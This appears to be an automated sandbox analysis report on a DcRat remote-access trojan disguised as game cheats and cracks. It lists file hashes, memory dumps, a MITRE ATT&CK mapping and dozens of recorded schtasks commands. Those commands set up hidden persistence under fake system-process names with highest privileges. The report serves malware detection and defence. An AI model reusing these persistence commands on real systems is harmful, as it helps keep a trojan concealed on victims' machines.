                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Windows\InputMethod\SHARED\spoolsv.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2296
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\InputMethod\SHARED\spoolsv.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2072
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Windows\InputMethod\SHARED\spoolsv.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4436
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\blockweb\WaaSMedicAgent.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2436
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\blockweb\WaaSMedicAgent.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3824
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\blockweb\WaaSMedicAgent.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4108
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\blockweb\RuntimeBroker.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4396
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\blockweb\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2092
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\blockweb\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3120
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Windows\Speech_OneCore\Engines\TTS\de-DE\NUSData\Registry.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2636
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\TTS\de-DE\NUSData\Registry.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5024
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Windows\Speech_OneCore\Engines\TTS\de-DE\NUSData\Registry.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1016
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dwm.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4432
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dwm.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4420
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dwm.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4832
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\wininit.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:756
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\wininit.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2356
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\wininit.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4112
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\fontdrvhost.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2032
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\fontdrvhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4532
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\fontdrvhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5028
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3428
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:960
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:708
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\blockweb\WmiPrvSE.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4388
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\blockweb\WmiPrvSE.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3248
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\blockweb\WmiPrvSE.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1160

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Persistence

                Boot or Logon Autostart Execution

                2
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Winlogon Helper DLL

                1
                T1547.004

                Create or Modify System Process

                2
                T1543

                Windows Service

                2
                T1543.003

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Privilege Escalation

                Boot or Logon Autostart Execution

                2
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Winlogon Helper DLL

                1
                T1547.004

                Create or Modify System Process

                2
                T1543

                Windows Service

                2
                T1543.003

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Defense Evasion

                Impair Defenses

                2
                T1562

                Disable or Modify Tools

                1
                T1562.001

                Modify Registry

                5
                T1112

                Credential Access

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                Lateral Movement

                Collection

                Command and Control

                Exfiltration

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log
                  Filesize

                  1KB

                  MD5

                  8094b248fe3231e48995c2be32aeb08c

                  SHA1

                  2fe06e000ebec919bf982d033c5d1219c1f916b6

                  SHA256

                  136c30d964f4abbb5279bdc86d0e00578333782f15f05f0d2d050730dcb7a9bc

                  SHA512

                  bf27a3822008796370e2c506c910a40992b9240606ea1bc19f683b2fee86b81897660ac0cf8e746ca093dae9e408949e2e9002ded75678a69f020d3b0452801f

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe
                  Filesize

                  229KB

                  MD5

                  06129ffc46e854930cfcaa754ca1d487

                  SHA1

                  e7c173c48aa107ec63bd6f9030c9ec6fe889d832

                  SHA256

                  10d28e18a7df4b2c30e05e5e361f1724e0b6ea8c021d8105ee30354be79b98d1

                  SHA512

                  b7121a2a65f317edbc1b4dd8dec427c277fad2b521a211d1408bc06b79431c418dad32ed61481c5ef49511cd167846e026a86147ae77bd9b0e607918feb66ab9

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                  Filesize

                  2.5MB

                  MD5

                  6e01d4882274684f48e04436103ad57f

                  SHA1

                  3b88df5fc9e6973bf3ecb1e2ed759b86774cb290

                  SHA256

                  424497764bc1e2cd57f454d173dceeb9dcd7f900aaf5060110da629d11fadf8d

                  SHA512

                  3e5ed6ee7458f4662dd9bbe572620fc591e69fbc6d8e98013ec0f39a95eb9da55561a232eea23192fbc59368b99f99ee6a00df23bcff253c327aa3eb607c7d7e

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe
                  Filesize

                  7.5MB

                  MD5

                  b76057df968a944446f950dd4ddc6aec

                  SHA1

                  bb64de1c677368764000d34c29528ead2f48405c

                  SHA256

                  afe91fea04d39de5710ad065252d13b9df7b7bd25788ddf5afb162a2f0a03296

                  SHA512

                  7f45198fe05013ceab477784bde2b1c4532607bd8ba8d9cfb09c5bb037dd2616086c8cb3afd669b24ec89eedbd270d00f1bd6bce2644b40ed36b8f32fc5fdb31

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe
                  Filesize

                  12.7MB

                  MD5

                  7db5128f7a81cc1af094d8898e79ff21

                  SHA1

                  d503984331d5999c14931c267d859fbd1510c282

                  SHA256

                  2952fa4ab9bc3e2b04b1f3ab6b648d0d23fa74856c50bf21fb13fddfe9a874bb

                  SHA512

                  caceec284b71df124d47267e5ca42bf84e558aa9606b0186f132fba8d2bead2ddbd9304cd82761270b6c42271e0937aeff605ef5d865c424cc29b39ca05b123a

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Primordial Crack.exe
                  Filesize

                  12.7MB

                  MD5

                  bbd6ffdb33259778f08704696a04891f

                  SHA1

                  0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba

                  SHA256

                  841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4

                  SHA512

                  1b66f11b3a3dea1e6a8f4f7ee493437a41e30704d1c80048efd245184a447fde6abf06fe45af0663a72b30b657a7297554df8c3af7b36ae2e0df21a5031a34e0

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\windows defender.bat
                  Filesize

                  3KB

                  MD5

                  4c35b71d2d89c8e8eb773854085c56ea

                  SHA1

                  ede16731e61348432c85ef13df4beb2be8096d9b

                  SHA256

                  3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                  SHA512

                  a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                  Download Submit

                • C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe
                  Filesize

                  221B

                  MD5

                  ca2cae3c10113fc32484a48196e2ffaa

                  SHA1

                  8eb74a53fe655c5b538246f42cc078d8900bf215

                  SHA256

                  98311058614dd00a0d0e9e9c38f9df5d1d951525741fc46901d1a396baddd8f2

                  SHA512

                  6cf05ca56f4c6320bc490401e742f81230e6c138651d958776f497d5e4889fe16c5853a1864791a3f10b4b3d103f5218894be4c7009d1eb7b32e243111b166af

                  Download Submit

                • C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat
                  Filesize

                  39B

                  MD5

                  19fe83feec263d4e4e68e3dd0e6b3615

                  SHA1

                  7ff948a654d54acfde0e798fe1d67160343f8dfd

                  SHA256

                  07dc5ed69f4847071b41d0086ef8a11032c2d85b1ec8a8b00a5d29480c3e6744

                  SHA512

                  ee6fef4211b60dff50b7cdb88f9ec0028a67bc428ab854c0932db7e5873f9a22e16760d59ff6b885fdb96ed7f6582d3735f629d6e825dcfd1e8c13c5d5adae78

                  Download Submit

                • C:\blockweb\file.vbs
                  Filesize

                  34B

                  MD5

                  677cc4360477c72cb0ce00406a949c61

                  SHA1

                  b679e8c3427f6c5fc47c8ac46cd0e56c9424de05

                  SHA256

                  f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b

                  SHA512

                  7cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a

                  Download Submit

                • C:\blockweb\portrefNet.exe
                  Filesize

                  2.2MB

                  MD5

                  84c6cb042dc58a109dfa2db8381bec28

                  SHA1

                  4a86e72e9d2c3e0c17cd3a09df754169f4b7ce31

                  SHA256

                  2e09ed806f9a7c57186872ab3715909437e2729500bc194e0a2cf3405c4cd5f0

                  SHA512

                  c8ef31a3eaeac8ef0faa043d0bdd085063d54572d0a7eefade08a9db5f97c397bb3270baca71817da9d91c0d1227fcee9ce019065bb5a66f20fed9d7349ab0ef

                  Download Submit

                • memory/708-46-0x0000000001E50000-0x0000000001E51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-45-0x0000000001E40000-0x0000000001E41000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-48-0x0000000003910000-0x0000000003911000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-47-0x0000000001E60000-0x0000000001E61000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-43-0x0000000001E20000-0x0000000001E21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-42-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-41-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/708-49-0x0000000000400000-0x0000000001B6B000-memory.dmp

                  Filesize

                  23.4MB

                  Download

                • memory/708-44-0x0000000001E30000-0x0000000001E31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/996-38-0x0000000000400000-0x00000000010BB000-memory.dmp

                  Filesize

                  12.7MB

                  Download

                • memory/1084-159-0x000000001B840000-0x000000001B896000-memory.dmp

                  Filesize

                  344KB

                  Download

                • memory/1692-66-0x0000000000400000-0x00000000018F3000-memory.dmp

                  Filesize

                  20.9MB

                  Download

                • memory/1692-60-0x0000000001BA0000-0x0000000001BA1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-59-0x0000000001B70000-0x0000000001B71000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-58-0x0000000001A10000-0x0000000001A11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-65-0x0000000001E80000-0x0000000001E81000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-64-0x0000000001E70000-0x0000000001E71000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-61-0x0000000001BB0000-0x0000000001BB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-63-0x0000000001BD0000-0x0000000001BD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1692-62-0x0000000001BC0000-0x0000000001BC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3132-12-0x00007FF92B7C3000-0x00007FF92B7C5000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/3132-26-0x00007FF92B7C0000-0x00007FF92C281000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/3132-11-0x00000187AE8C0000-0x00000187AE900000-memory.dmp

                  Filesize

                  256KB

                  Download

                • memory/3132-40-0x00007FF92B7C0000-0x00007FF92C281000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/4376-104-0x00000000001C0000-0x00000000003FA000-memory.dmp

                  Filesize

                  2.2MB

                  Download

                • memory/4376-105-0x0000000000C60000-0x0000000000C7C000-memory.dmp

                  Filesize

                  112KB

                  Download

                • memory/4376-106-0x000000001B010000-0x000000001B060000-memory.dmp

                  Filesize

                  320KB

                  Download

                • memory/4376-107-0x0000000000C80000-0x0000000000C96000-memory.dmp

                  Filesize

                  88KB

                  Download

                • memory/4376-108-0x000000001AE70000-0x000000001AEC6000-memory.dmp

                  Filesize

                  344KB

                  Download

                • memory/4376-109-0x0000000002550000-0x000000000255E000-memory.dmp

                  Filesize

                  56KB

                  Download

                • memory/4376-110-0x0000000002560000-0x0000000002568000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/4376-111-0x0000000002570000-0x0000000002578000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/4476-25-0x0000000000400000-0x00000000010F7000-memory.dmp

                  Filesize

                  13.0MB

                  Download